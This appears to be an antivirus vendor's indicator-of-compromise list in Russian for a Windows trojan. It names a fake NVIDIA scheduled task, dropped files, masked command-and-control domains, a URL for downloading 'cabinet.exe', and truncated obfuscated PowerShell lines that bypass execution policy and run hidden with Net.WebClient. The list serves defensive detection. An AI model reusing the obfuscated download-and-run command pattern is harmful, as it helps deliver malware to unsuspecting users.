Техническая информация
- <SYSTEM32>\tasks\nvngxupdatecheckdaily_{48237f1a-7f1a-7f1a-7f1a-48237f1a7f1a}
- '%LOCALAPPDATA%\tempavr94.exe'
- %LOCALAPPDATA%\tempavr94.exe
- %TEMP%\9419.tmp
- %APPDATA%\vwtartg
- %APPDATA%\vwtartg
- %LOCALAPPDATA%\tempavr94.exe
- 'in#####tioshopname.ru':80
- 'ya##ha.ug':80
- 'cr###pexpire.ug':80
- http://uk##net.ru/image/cabinet.exe
- http://in#####tioshopname.ru/
- http://ya##ha.ug/
- DNS ASK uk##net.ru
- DNS ASK in#####tioshopname.ru
- DNS ASK ya##ha.ug
- DNS ASK cr###pexpire.ug
- '<SYSTEM32>\cmd.exe' /c YMBvaurOoNCzHAJ & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c YMBvaurOoNCzHAJ & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....